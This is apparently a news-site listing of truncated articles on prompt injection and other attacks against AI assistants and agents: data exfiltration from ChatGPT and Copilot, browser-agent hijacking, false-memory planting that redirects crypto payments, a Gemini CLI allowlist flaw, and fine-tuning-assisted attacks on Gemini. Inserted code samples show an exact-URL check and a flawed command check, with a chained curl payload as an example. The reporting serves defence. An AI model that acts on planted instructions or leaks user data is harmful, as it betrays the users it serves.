Microsoft has fixed a vulnerability in its Copilot AI assistant that allowed hackers to pluck a host of sensitive user […]
Category: prompt injections
ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues
To block the attack, OpenAI restricted ChatGPT to opening URLs only exactly as provided, refusing to add parameters to […]
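The mitigation described in the excerpt can be illustrated with a minimal sketch: the agent keeps a set of URLs exactly as they were provided and refuses any request that does not match verbatim, so an injected query string carrying exfiltrated data is rejected. This is an assumption-laden illustration, not OpenAI's actual implementation; the function and variable names are hypothetical.

```python
def is_allowed(requested: str, provided_urls: set[str]) -> bool:
    """Hypothetical sketch of an exact-match URL policy.

    Only URLs that appear verbatim in `provided_urls` may be opened.
    Any appended parameter or fragment (e.g. "?d=<stolen secret>")
    changes the string and is therefore refused.
    """
    return requested in provided_urls


provided = {"https://example.com/page"}
print(is_allowed("https://example.com/page", provided))           # True
print(is_allowed("https://example.com/page?d=secret", provided))  # False
```

The strictness is the point: normalizing or "helpfully" completing URLs is exactly the behavior a prompt-injection payload exploits to smuggle data into a request.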
Syntax hacking: Researchers discover sentence structure can bypass AI safety rules
Adventures in pattern-matching: New research offers clues about why some prompt injection attacks may succeed. Researchers from MIT, Northeastern University, […]
Claude’s new AI file creation feature ships with deep security risks built in
Independent AI researcher Simon Willison, reviewing the feature today on his blog, noted that Anthropic’s advice to “monitor Claude while […]
New AI browser agents create risks if sites hijack them with hidden instructions
The company tested 123 cases representing 29 different attack scenarios and found a 23.6 percent attack success rate when browser […]
Flaw in Gemini CLI coding tool could allow hackers to run nasty commands
“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox […]
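The flaw Cox describes, as quoted, is that only the first token of the command string is validated. A minimal sketch of that class of bug (not Gemini CLI's actual code; names are hypothetical) shows how a benign first word lets a chained payload through:

```python
import shlex

ALLOWLIST = {"grep", "cat", "ls"}


def naive_is_safe(command: str) -> bool:
    """Flawed check in the spirit of the reported bug: only the first
    word of the command string is compared to the allowlist, so shell
    metacharacters (';', '&&', '|') later in the string go unchecked.
    """
    first = shlex.split(command)[0]
    return first in ALLOWLIST


# The injected second command rides along behind an allowed "grep":
print(naive_is_safe("grep foo file.txt; curl http://attacker.example"))  # True
print(naive_is_safe("rm -rf /"))                                         # False
```

A robust version would parse the full command line and validate every element, or avoid passing strings through a shell at all.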
New attack can steal cryptocurrency by planting false memories in AI chatbots
Malicious “context manipulation” technique causes bot to send payments to attacker’s wallet. Imagine a world where AI-powered […]
Researchers claim breakthrough in fight against AI’s frustrating security hole
99% detection is a failing grade: Prompt injections are the Achilles’ heel of AI assistants. Google offers a potential fix. […]
Gemini hackers can deliver more potent attacks with a helping hand from… Gemini
MORE FUN(-TUNING) IN THE NEW WORLD: Hacking LLMs has always been more art than science. A new attack on Gemini […]
